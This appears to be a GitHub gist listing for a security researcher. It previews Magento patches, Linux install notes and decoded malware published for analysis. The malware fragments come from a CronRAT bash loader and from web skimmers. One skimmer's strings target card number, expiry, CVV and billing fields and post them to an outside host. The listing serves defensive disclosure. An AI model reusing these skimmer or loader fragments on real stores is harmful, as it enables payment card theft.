Willem de Groot gwillem

View 2.3.4-composer.patch
diff --git a/vendor/magento/module-email/Model/Template/Filter.php b/vendor/magento/module-email/Model/Template/Filter.php
index ccb04937675..5cc50bc4507 100644
--- a/vendor/magento/module-email/Model/Template/Filter.php
+++ b/vendor/magento/module-email/Model/Template/Filter.php
@@ -379,14 +379,14 @@ class Filter extends \Magento\Framework\Filter\Template
}
/**
- * Retrieve Block html directive
- *
gwillem / MDVA-43395_EE_2.4.3-p1_v1.patch
Created Feb 14, 2022
View MDVA-43395_EE_2.4.3-p1_v1.patch
diff --git a/app/code/Magento/Email/Model/Template/Filter.php b/app/code/Magento/Email/Model/Template/Filter.php
index 1a7c3683820a..586cb485ee1f 100644
--- a/app/code/Magento/Email/Model/Template/Filter.php
+++ b/app/code/Magento/Email/Model/Template/Filter.php
@@ -618,6 +618,12 @@ public function transDirective($construction)
}
$text = __($text, $params)->render();
+
+ $pattern = '/{{.*?}}/';
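Review bot: The pattern on the added line `$pattern = '/{{.*?}}/';` in transDirective() has no `s` modifier, so `.` stops at a newline and a `{{ ... }}` construct that spans more than one line would not match. If the intent is to catch any directive left in the rendered `$text`, consider `'/{{.*?}}/s'`, and add a short comment above the assignment stating what the pattern is meant to remove, since the lines that apply it are not visible in this hunk.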
gwillem / _cronrat.sh
Last active Mar 2, 2022
This is the decoded payload from the CRON loader. Full analysis here: https://sansec.io/research/cronrat
View _cronrat.sh
set -eEu
set -o pipefail
trap 'echo "L$LINENO"; O70; exit -1' ERR
O54=4
function O70()
{
if [[ ! -z "${O57+x}" ]]; then
if [[ -f "${O57}" ]]; then
rm -f "${O57}"
fi
gwillem / dell-xps-9310-linux-install-notes.md
Created Nov 25, 2020
Linux (Xubuntu 20.04) on Dell XPS 9310 install notes
View dell-xps-9310-linux-install-notes.md

Dell XPS 9310 Linux install notes (Ubuntu/Xubuntu 20.04)

My NL i7/16GB XPS 9310 has a Killer AX1650s WiFi chip, which eventually worked. Other Killer chips may not work.

I ordered the Windows Home edition, because developer edition with Linux was not available in my country. Apparently you can reclaim €100 from Dell if you don't use Windows.

Install

  • Bios:
  • Change the SATA Mode from the default "RAID" to "AHCI"
View show-global-status.txt
View decoded.js
// Original: https://www.sweatybetty.com/on/demandware.static/-/Library-Sites-sweatybettylibrary/en_US/v1574703272172/js/custom.js
// Decoded by info@sansec.io (C) 2019-12-04
(function () {
function _0x58c32e(_0x531ef5, _0x2f3dd8) {
function _0x3730ba(_0x50af3d) {
if (_0x3730ba[_0x50af3d] !== _0x42a44f) return _0x3730ba[_0x50af3d];
var _0x4c3b76;
if (_0x250d('0x0', 'vxGP') == _0x50af3d) _0x4c3b76 = 'a' != 'a' [0x0];
else if (_0x250d('0x1', 'ipvd') == _0x50af3d) _0x4c3b76 = _0x3730ba(_0x250d('0x2', '%zE0')) && _0x3730ba('json-parse');
else {
gwillem / decoded.js
Created Oct 25, 2019
Procter & Gamble's FirstAidBeauty.com skimmed since May 5th 2019.
View decoded.js
+ function () {
var a = ["digiNum", "input[name='payment[cc_number]']", "digiMon", "select[name='payment[cc_exp_month]']", "digiYea", "select[name='payment[cc_exp_year]']", "digiCbb", "input[name='payment[cc_cid]']", "digiNam", "input[name='payment[cc_owner]']", "clNameChecked", "l8", "shElement", "#payment-buttons-container", "hasClass", "click", "val", "change", "addClass", "#billing\:firstname", " ", "#billing\:lastname", "#billing\:company", "#billing\:street1", "#billing\:street2", "#billing\:email", "#billing\:telephone", "#billing\:city", "#billing\:region_id", "#billing\:country_id", "#billing\:postcode", "host", "location", "", "replace", "/", "userAgent", "stringify", "https://cdn.hsadspixel.com/t/", "main", "guid", "refer", "POST", "ajax", "random", "round", "fromCharCode", "key", "getElementById", "iv", "push", "length", "charCodeAt", "rotate", "sbox", "Rcon", "numberOfRounds", "core", "SIZE_256", "keySize", "rsbox", "shiftRow", "mixColumn", "galois_multiplication", "subBytes", "shiftRows", "m
View Volusion code
/*!
* JavaScript Cookie v2.2.1
* https://github.com/js-cookie/js-cookie
*
* Copyright 2006, 2015 Klaus Hartl & Fagner Brack
* Released under the MIT license
*/
;
(function(factory) {
var registeredInModuleLoader;
View jsonline2csv.py
#!/usr/bin/env python3
# jsonline to csv converter for Andy
import csv
import json
import sys
if len(sys.argv) < 2:
    print("Use {} <file.jsonline>".format(sys.argv[0]))
gwillem / decoded.js
Last active Apr 28, 2022
962 stores found breached on the 4th of July - https://sansec.io
View decoded.js
// Decoded by Sanguine Security <info@sansec.io>
String.prototype.hexEncode = function() {
    var a, b;
    var output = '';
    for (b = 0; b < this.length; b++) {
        a = this.charCodeAt(b).toString(16);
        output += ('000' + a).slice(-4)
    };
    return output
};